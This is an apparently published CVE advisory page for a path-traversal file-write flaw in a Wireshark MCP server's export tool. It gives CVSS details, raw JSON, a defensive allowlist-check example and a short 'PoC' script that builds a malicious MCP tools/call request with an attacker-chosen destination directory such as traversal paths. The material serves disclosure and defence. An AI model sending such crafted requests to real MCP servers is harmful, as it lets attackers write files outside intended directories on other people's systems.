Security Vulnerability Report
CVE-2026-43901 CVSS 6.8 MEDIUM


Published: 2026-05-11 23:20:22
Last Modified: 2026-05-11 23:20:22

Description

Wireshark MCP is an MCP Server that turns tshark into a structured analysis interface, then layers in optional Wireshark suite utilities. In 1.1.5 and earlier, wireshark-mcp exposes a wireshark_export_objects MCP tool that accepts an attacker-controlled dest_dir parameter and passes it to tshark's --export-objects flag with no mandatory path restriction. The path sandbox (_allowed_dirs) is None by default and only activates when the environment variable WIRESHARK_MCP_ALLOWED_DIRS is explicitly set. In a default installation, any directory on the filesystem can be used as the export destination.
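
An added example, not the project's code or its fix: a fail-closed version of the destination check that the description says is skipped when the allowlist is unset. `load_allowed_roots`, `resolve_export_dir` and `ExportPathError` are hypothetical names, and the `os.pathsep`-separated format for WIRESHARK_MCP_ALLOWED_DIRS is an assumption.

```python
import os
import tempfile
from pathlib import Path

ENV_VAR = "WIRESHARK_MCP_ALLOWED_DIRS"  # name from the advisory


class ExportPathError(ValueError):
    """Destination rejected by the export allowlist."""


def load_allowed_roots(environ=os.environ):
    """Unset or empty variable -> [] (deny all), never None (allow all)."""
    raw = environ.get(ENV_VAR, "")
    # Assumption: entries are separated by os.pathsep, as in PATH.
    return [Path(p).resolve() for p in raw.split(os.pathsep) if p.strip()]


def resolve_export_dir(dest_dir, allowed_roots):
    """Return the canonical destination or raise ExportPathError."""
    if not allowed_roots:
        raise ExportPathError(f"{ENV_VAR} is not set; export refused")
    # resolve() collapses '..' and follows symlinks before the comparison.
    candidate = Path(dest_dir).resolve()
    for root in allowed_roots:
        # Compare path components, not string prefixes ('exports-x' != 'exports').
        if candidate == root or root in candidate.parents:
            return candidate
    raise ExportPathError(f"{dest_dir!r} is outside the allowed roots")


def demo():
    """Check constructed destinations; returns {label: resolved path or None}."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp, "exports")
        root.mkdir()
        roots = load_allowed_roots({ENV_VAR: str(root)})
        cases = {  # constructed sample inputs
            "inside": root / "case1",
            "traversal": root / ".." / "elsewhere",
            "prefix_sibling": Path(str(root) + "-x"),
        }
        out = {}
        for label, dest in cases.items():
            try:
                out[label] = resolve_export_dir(str(dest), roots)
            except ExportPathError:
                out[label] = None
        return out
```

The caller should hand the returned canonical path, not the original request string, to the export step, so the path that was checked is the path that is written.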

CVSS Details

CVSS Score: 6.8
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:N

Configurations (Affected Products)

No configuration data available.

Wireshark MCP <= 1.1.5

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
"""
Conceptual Proof of Concept (PoC) for CVE-2026-43901
This script demonstrates how a malicious actor could craft an MCP request
to exploit the arbitrary file write vulnerability in Wireshark MCP <= 1.1.5.
"""
import json


def create_malicious_mcp_request(pcap_path, malicious_destination):
    r"""
    Constructs a JSON-RPC request for the wireshark_export_objects tool.

    Args:
        pcap_path (str): Path to a valid pcap file on the server or accessible by the server.
        malicious_destination (str): The arbitrary directory path where the attacker wants to write files.
            e.g., '../../../tmp/' or 'C:\Windows\Temp'
    """
    # The tool name vulnerable in CVE-2026-43901
    tool_name = "wireshark_export_objects"

    # Arguments passed to the tool
    # 'dest_dir' is the vulnerable parameter
    arguments = {
        "pcap_file": pcap_path,
        "dest_dir": malicious_destination,
        "protocol": "http"  # specific protocol to export, e.g., http, smb, etc.
    }

    # Standard MCP (Model Context Protocol) JSON-RPC structure
    payload = {
        "jsonrpc": "2.0",
        "method": "tools/call",
        "params": {
            "name": tool_name,
            "arguments": arguments
        },
        "id": 1
    }

    return json.dumps(payload, indent=2)


if __name__ == "__main__":
    # Example Scenario:
    # An attacker wants to write exported objects to a sensitive directory.
    # Note: In a real attack, the attacker would need a way to trigger the MCP client
    # to send this request to the server.
    target_pcap = "/var/log/capture.pcap"

    # Using absolute path or traversal to write outside intended sandbox
    attack_dir = "/tmp/pwned/"

    exploit_request = create_malicious_mcp_request(target_pcap, attack_dir)

    print("Generated Malicious MCP Request Payload:")
    print(exploit_request)
    print("\n[!] If the server processes this, files will be written to:", attack_dir)
```

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-43901", "sourceIdentifier": "[email protected]", "published": "2026-05-11T23:20:21.697", "lastModified": "2026-05-11T23:20:21.697", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "Wireshark MCP is an MCP Server that turns tshark into a structured analysis interface, then layers in optional Wireshark suite utilities. In 1.1.5 and earlier, wireshark-mcp exposes a wireshark_export_objects MCP tool that accepts an attacker-controlled dest_dir parameter and passes it to tshark's --export-objects flag with no mandatory path restriction. The path sandbox (_allowed_dirs) is None by default and only activates when the environment variable WIRESHARK_MCP_ALLOWED_DIRS is explicitly set. In a default installation, any directory on the filesystem can be used as the export destination."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:N", "baseScore": 6.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.6, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-22"}]}], "references": [{"url": "https://github.com/bx33661/Wireshark-MCP/security/advisories/GHSA-3r68-x3xc-rxpg", "source": "[email protected]"}]}}